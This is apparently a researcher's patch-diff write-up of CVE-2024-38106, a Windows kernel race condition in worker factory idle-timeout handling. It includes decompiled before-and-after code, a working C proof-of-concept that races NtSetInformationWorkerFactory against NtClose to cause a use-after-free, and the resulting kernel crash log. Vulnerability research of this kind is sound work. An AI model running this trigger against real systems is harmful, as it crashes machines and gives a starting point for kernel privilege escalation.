Dissecting the CVE-2024-38106 Fix

In the August security patches, Microsoft fixed several ntoskrnl.exe bugs, one of which (CVE-2024-38106) was being exploited in the wild (ITW). As anything exploited ITW always requires closer attention, we attempted to create a POC for it by diffing the kernel before and after the patch. Windows versions used during patch analysis: Windows 11, July 25 vs August 14.

This post is not meant to be a deep-dive root cause analysis, but hopefully will still be interesting.

Below are the results:

1.jpg

After quickly filtering out non-security changes, we identified two functions of interest: VslGetSetSecureContext() and NtSetInformationWorkerFactory().

VslGetSetSecureContext()

Before:

/*
 * Pre-patch decompiler output (local declarations omitted by the listing).
 * Fills a 0x68-byte argument block with the caller-supplied a2..a4 and hands
 * it straight to VslpEnterIumSecureMode(); nothing in this version locks the
 * caller's buffers before the call.
 */
__int64 __fastcall VslGetSetSecureContext(__int64 a1, __int64 a2, __int64 a3, __int64 a4)
{
 memset(v11, 0, 0x68ui64);              /* zero the whole argument block */
 v11[1] = a2;
 v11[2] = a3;
 v11[3] = a4;
 LOWORD(v8) = (a1 != 0) + 14;           /* 14 when a1 == 0, otherwise 15 */
 LOBYTE(v9) = 2;
 return VslpEnterIumSecureMode(v9, v8, 0i64, v11);
}

After:

__int64 __fastcall VslGetSetSecureContext(__int64 a1, int a2, int a3)
{
 memset(v11, 0, 0x68ui64);
 memset(v10, 0, 0x48ui64);
 v6 = 15;
 if ( !a1 )
   v6 = 14;
 WORD1(v11[0]) = v6;
 result = VslpLockPagesForTransfer((unsigned int)v10, a2, a3, a1 != 0, 0);
 if ( (int)result >= 0 )
 {
   v11[1] = v10[0];
   LOBYTE(v8) = 2;
   v11[2] = v10[7];
   v9 = VslpEnterIumSecureMode(v8, WORD1(v11[0]), 0i64, v11);
   VslpUnlockPagesForTransfer(v10);
   return v9;
 }
 return result;

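This patch appears to fix a race condition: the caller-supplied buffers are now locked with VslpLockPagesForTransfer() before VslpEnterIumSecureMode() is called and released with VslpUnlockPagesForTransfer() afterwards. VslpEnterIumSecureMode() is presumably related to the VBS secure kernel.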

NtSetInformationWorkerFactory()

The code changes here are a bit more complicated. The security-related part looks as follows:

Before:

if ( v69[3] >= 0i64 )
  goto LABEL_155;
if ( v69[3] > (__int64)0xFFFFFFFFFF676980ui64 )
  v69[3] = 0xFFFFFFFFFF676980ui64;
if ( v69[3] < (__int64)0xFFFFFFFE9A5F4400ui64 )
  v69[3] = 0xFFFFFFFE9A5F4400ui64;
v40 = v69[3];
*((_QWORD *)v15 + 14) = v69[3];
v69[1] = -1i64;
KeSetTimer2(v15 + 424, v40, -v40, v69);
goto LABEL_89;

After:

   case 2:	// enum WORKERFACTORYINFOCLASS: WorkerFactoryIdleTimeout 
      if ( (unsigned int)Feature_1697191224__private_IsEnabledDeviceUsage()
        && *(_BYTE *)(*((_QWORD *)v16 + 2) + 0x21i64) )
      {
        Thread = 0x80;
        goto LABEL_41;
      }
      v20 = v63[3];
      if ( v63[3] >= 0i64 )
      {
        Thread = 0xC000000D;
        v15 = 0;
      }
      else
      {
        if ( v63[3] > -10000000i64 )
          v20 = -10000000i64;
        if ( v20 < -6000000000i64 )
          v20 = -6000000000i64;
        v63[3] = v20;
        *((_QWORD *)v16 + 14) = v20;
        v63[1] = -1i64;
        KeSetTimer2((__int64)(v16 + 424), v20, -v20, (__int64)v63);
        v15 = 0;
      }
      goto LABEL_99;

As you can see, a flag check has been added:

*(_BYTE *)(*((_QWORD *)v16 + 2) + 0x21i64) )

This flag is set during shutdown inside NtShutdownWorkerFactory() –> ExpShutdownWorkerFactory():

Object = 0i64;
v4 = ObReferenceObjectByHandle(a1, 0x20u, ExpWorkerFactoryObjectType, PreviousMode, &Object, 0i64);
if ( v4 >= 0 )
{
  v5 = (struct _EX_RUNDOWN_REF *)Object;
  ExpShutdownWorkerFactory(Object);
if ( (Object[51] & 0x200) != 0 )
    ExpLeaveWorkerFactoryAwayMode(Object);
if ( (_QWORD *)Object[74] == Object + 53 && (unsigned __int8)KiDeregisterObjectWaitBlock(Object + 53) )
    ObfDereferenceObjectWithTag(Object, 0x746C6644u);
*(_BYTE *)(Object[2] + 33i64) = 1;            // shutdown flag set

This means that there is indeed a race condition between arming the idle-timeout timer (by NtSetInformationWorkerFactory(.., WorkerFactoryIdleTimeout, ..)) and destruction of the worker factory object (by NtShutdownWorkerFactory()). The POC is shown below.

Proof of Concept

#include "nt.h"
#include "stdio.h"
#include "time.h"

#define TEST_RACE_COUNT 0x6000

HANDLE hWorkingFactory;
HANDLE hIoCompletion;
HANDLE hProcess;

/*
 * Thread routine: repeatedly creates a worker factory and immediately closes
 * its handle. The handle is published through the global hWorkingFactory so
 * that the other threads of the test can operate on it concurrently; the
 * unsynchronised access to that global is intentional.
 *
 * Param is unused. The thread exits with code 0 after 0x800000 iterations,
 * or with code 1 if the I/O completion port cannot be created.
 */
DWORD WINAPI th_working_factory_constructor(LPVOID Param) 
{
  (void)Param;

  hProcess = GetCurrentProcess();
  hIoCompletion = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
  if (hIoCompletion == NULL) {
    /* Without a completion port every NtCreateWorkerFactory call would fail. */
    fprintf(stderr, "CreateIoCompletionPort failed: %lu\n", GetLastError());
    ExitThread(1);
  }

  for (int i = 0; i < 0x800000; i++) {
    hWorkingFactory = NULL;
    NTSTATUS stat = NtCreateWorkerFactory(&hWorkingFactory, GENERIC_ALL, NULL, hIoCompletion, hProcess, NULL, 0, 2, 0, 0);
    if (stat < 0) {
      /* Creation failed: there is no handle to close on this iteration. */
      continue;
    }
    NtClose(hWorkingFactory);
  }

  ExitThread(0);
}

/*
 * Hammers NtSetInformationWorkerFactory(WorkerFactoryIdleTimeout) on whatever
 * handle is currently stored in the global hWorkingFactory. Each timeout in
 * the table is issued TEST_RACE_COUNT times before moving to the next one.
 *
 * NOTE(review): this function is started via CreateThread() through a cast to
 * LPTHREAD_START_ROUTINE although its signature is void(void) -- confirm this
 * is acceptable for the target ABI.
 */
void race_test_working_factory() 
{
  /* Negative values are relative due times in 100 ns units: 0.1 s up to 3 s. */
  static const LONGLONG timeouts[] = { -1000000LL, -2000000LL, -3000000LL, -5000000LL, -10000000LL, -20000000LL, -30000000LL };
  const size_t timeout_count = sizeof(timeouts) / sizeof(timeouts[0]);

  LARGE_INTEGER liDueTime;

  for (size_t k = 0; k < timeout_count; k++) {
    for (size_t i = 0; i < TEST_RACE_COUNT; i++) {
      /* Re-initialised on every call because the buffer is passed non-const. */
      liDueTime.QuadPart = timeouts[k];
      NtSetInformationWorkerFactory(hWorkingFactory, WorkerFactoryIdleTimeout, &liDueTime, sizeof(liDueTime));
    }
  }
}

/*
 * Endlessly closes whatever handle is currently stored in the global
 * hWorkingFactory. Never returns.
 */
void race_test_close() {
  for (;;) {
    NtClose(hWorkingFactory);
  }
}

/*
 * Waits for a key press, then starts the three racing threads (constructor,
 * idle-timeout setter, closer) and blocks until the constructor thread ends.
 *
 * NOTE(review): race_test_working_factory and race_test_close are void(void)
 * functions cast to LPTHREAD_START_ROUTINE -- confirm this is acceptable for
 * the target ABI.
 */
void race_test_nls() {
  getchar();  /* pause so the run can be started manually */

  HANDLE hThread_constructor = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)th_working_factory_constructor, 0, 0, NULL);
  HANDLE hThread_constructor3 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)race_test_working_factory, 0, 0, NULL);
  HANDLE hThread_constructor2 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)race_test_close, 0, 0, NULL);

  if (hThread_constructor == NULL || hThread_constructor3 == NULL || hThread_constructor2 == NULL) {
    /* Without all three threads the race cannot be exercised as intended. */
    fprintf(stderr, "CreateThread failed (constructor=%p setter=%p closer=%p)\n",
            (void *)hThread_constructor, (void *)hThread_constructor3, (void *)hThread_constructor2);
  }

  if (hThread_constructor != NULL) {
    WaitForSingleObject(hThread_constructor, INFINITE);
    CloseHandle(hThread_constructor);
  }

  /* Closing a thread handle does not stop the thread; it only drops our reference. */
  if (hThread_constructor3 != NULL) {
    CloseHandle(hThread_constructor3);
  }
  if (hThread_constructor2 != NULL) {
    CloseHandle(hThread_constructor2);
  }
}

/*
 * Entry point: seeds the C PRNG, runs init_lib_calls() (defined outside this
 * listing; presumably resolves the Nt* entry points -- confirm), records the
 * current-process pseudo handle and starts the race test.
 */
int main() {
  srand((unsigned int)time(NULL));

  init_lib_calls();
  hProcess = GetCurrentProcess();

  race_test_nls();
  return 0;
}

Note that the trigger requires calling NtClose() on the worker factory object handle to reach the vulnerable state.

Crash Log

IRQL_NOT_LESS_OR_EQUAL (a)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If a kernel debugger is available get the stack backtrace.
Arguments:
Arg1: ffff800520e90f50, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000000, bitfield :
    bit 0 : value 0 = read operation, 1 = write operation
    bit 3 : value 0 = not an execute operation, 1 = execute operation (only on chips which support this level of status)
Arg4: fffff803250bc750, address which referenced memory

Debugging Details:

Key  : WER.OS.Version
Value: 10.0.19041.1
BUGCHECK_CODE:  a
BUGCHECK_P1: ffff800520e90f50
BUGCHECK_P2: 2
BUGCHECK_P3: 0
BUGCHECK_P4: fffff803250bc750
READ_ADDRESS:  ffff800520e90f50 Special pool
PROCESS_NAME:  nt_race_tester.exe

TRAP_FRAME:  ffffc38c54653740 -- (.trap 0xffffc38c54653740)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=ffff800520e90f20 rbx=0000000000000000 rcx=000000006a4618d3
rdx=ffff800520e90f20 rsi=0000000000000000 rdi=0000000000000000
rip=fffff803250bc750 rsp=ffffc38c546538d0 rbp=0000000000000001
 r8=ffffc38c54653900  r9=0000000000000000 r10=fffff80324e0d000
r11=ffff800523464f20 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na pe nc
nt!KiInsertTimer2WithCollectionLockHeld+0xc0:
fffff803250bc750 483b4a30        cmp     rcx,qword ptr [rdx+30h] ds:ffff800520e90f50=????????????????
Resetting default scope

STACK_TEXT:
ffffc38c54652e48 fffff80325325e12     : ffffc38c54652fb0 fffff8032518c470 0000000000000000 0000000000000000 : nt!DbgBreakPointWithStatus
ffffc38c54652e50 fffff803253253f6     : 0000000000000003 ffffc38c54652fb0 fffff80325222ae0 000000000000000a : nt!KiBugCheckDebugBreak+0x12
ffffc38c54652eb0 fffff8032520abf7     : 0000000000000000 0000000000000001 ffff800512a86f08 ffffc38c546535e0 : nt!KeBugCheck2+0x946
ffffc38c546535c0 fffff8032521f3a9     : 000000000000000a ffff800520e90f50 0000000000000002 0000000000000000 : nt!KeBugCheckEx+0x107
ffffc38c54653600 fffff8032521ad78     : 0000000000000400 ffffc60d744dcec0 0000000000000218 ffff800505d7af20 : nt!KiBugCheckDispatch+0x69
ffffc38c54653740 fffff803250bc750     : 0000000000000000 ffff800512a86f8a 0000000000000000 fffff80325a3ece0 : nt!KiPageFault+0x478
ffffc38c546538d0 fffff803250bc3e2     : ffff800512a86f08 ffff800512a86f01 0000000000000001 0000000000000001 : nt!KiInsertTimer2WithCollectionLockHeld+0xc0
ffffc38c54653920 fffff80325116e5b     : 0000000000000000 00001f8000e90000 0000000000000002 0000000000000000 : nt!KeSetTimer2+0x172
ffffc38c54653990 fffff8032521eb05     : 0000000000000000 0000000000000000 0000000000000000 ffff800500000000 : nt!NtSetInformationWorkerFactory+0x62b
ffffc38c54653b00 00007ffd7f0704c4     : 00007ff668ab1304 0000000000000000 0000000000000000 0000000000000000 : nt!KiSystemServiceCopyEnd+0x25
0000000e9d7ffe58 00007ff668ab1304     : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : ntdll!NtSetInformationWorkerFactory+0x14
0000000e9d7ffe60 0000000000000000     : 0000000000000000 0000000000000000 0000000000000000 0000000000000003 : nt_race_tester+0x1304

SYMBOL_NAME:  nt!KiInsertTimer2WithCollectionLockHeld+c0
MODULE_NAME: nt
IMAGE_NAME:  ntkrnlmp.exe

As we can see, by the time execution reaches KiInsertTimer2WithCollectionLockHeld(), the worker factory object and its associated timer have already been freed.

3: kd> dq ffff800520e90f50
ffff800520e90f50  ???????????????? ????????????????
ffff800520e90f60  ???????????????? ????????????????
ffff800520e90f70  ???????????????? ????????????????
ffff800520e90f80  ???????????????? ????????????????
ffff800520e90f90  ???????????????? ????????????????
ffff800520e90fa0  ???????????????? ????????????????
ffff800520e90fb0  ???????????????? ????????????????
ffff800520e90fc0  ???????????????? ????????????????
3: kd> !pool ffff800520e90f50
Pool page ffff800520e90f50 region is Special pool
ffff800520e90000: Unable to get contents of special pool block